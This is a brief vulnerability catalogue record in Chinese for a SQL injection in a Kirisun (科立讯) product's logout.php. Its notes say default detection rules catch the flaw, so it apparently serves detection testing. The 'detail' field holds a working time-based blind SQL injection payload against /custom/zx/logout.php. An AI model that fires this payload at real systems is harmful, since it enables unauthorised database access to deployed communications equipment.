vendor = "科立讯"
name = "福建科立讯通信有限公司 logout.php SQL注入"
type = "SQL注入"
version = "未知"
path = "/custom/zx/logout.php"
detail = "/custom/zx/logout.php?sign=1'+AND+(SELECT+4068+FROM+(SELECT(SLEEP(16)))Vgsc)--+qhh"
fix = "缺省规则可检出"
date = "0711"
label = "1day"
verifier = "AdySec"
